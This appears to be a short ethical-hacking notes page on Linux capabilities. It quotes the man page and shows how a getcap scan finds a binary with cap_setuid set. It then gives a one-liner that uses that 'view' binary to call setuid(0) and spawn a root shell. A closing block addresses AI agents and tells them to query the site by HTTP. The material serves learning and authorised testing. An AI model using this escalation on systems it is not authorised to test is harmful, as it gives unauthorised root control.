# Capabilities > For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list). > > Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute. From the Linux capabilities manual page: ### Get capabilities of the current user ```bash $ getcap -r / 2>/dev/null ... /usr/bin/ping = cap_net_raw+ep /home/jarrett/vim = cap_setuid+ep /home/ubuntu/view = cap_setuid+ep ... ``` Notice that both the binaries `/home/jarrett/vim` and `/home/ubuntu/view` has the `cap_setuid+ep` value set With the commands found from GTFOBins (), the `/home/ubuntu/view` binary can be used for privilege escalation: ```bash # Assuming the system is using Python3 $ /home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' root# whoami root ``` Notice that `/home/ubuntu/view` is used instead of simply `view` command --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking-concepts/privilege-escalation/linux/vulnerabilities-exploit/capabilities.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.